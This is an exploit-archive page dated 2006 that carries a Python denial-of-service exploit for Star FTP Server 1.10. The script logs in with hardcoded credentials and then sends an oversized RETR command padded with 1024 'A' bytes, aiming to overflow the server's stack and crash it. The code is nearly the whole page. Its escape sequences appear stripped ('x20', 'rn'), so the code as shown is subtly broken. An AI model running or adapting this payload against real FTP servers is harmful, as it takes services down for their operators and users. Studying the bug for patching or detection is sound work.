Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit
# Published : 2006-12-17
# Author : Necro
# Previous Title : wget <= 1.10.2 (Unchecked Boundary Condition) Denial of Service Exploit
# Next Title : Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit

# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro <neco * ihack.pl> http://iHACK.pl

from socket import *
from sys import exit

print 'n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro <necro*ihack.pl> http://iHACK.pl'

host = '127.0.0.1'
port = 21

username = 'necro'
password = 'dupa'

evil = 'RETR' + 'x20' + 'x41' * 1024 + 'rn'

s = socket(AF_INET, SOCK_STREAM)
try:
   s.connect((host, port))
except:
   print 'n[-] Connection Error'
   exit()

s.recv(1024)
s.send('USER' + 'x20' + username + 'rn')
s.recv(1024)
s.send('PASS' + 'x20' + password + 'rn')
s.recv(1024)
s.send('PORT 2000rn')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()

print '[+] Done, shutdown.'

# www.Syue.com [2006-12-17]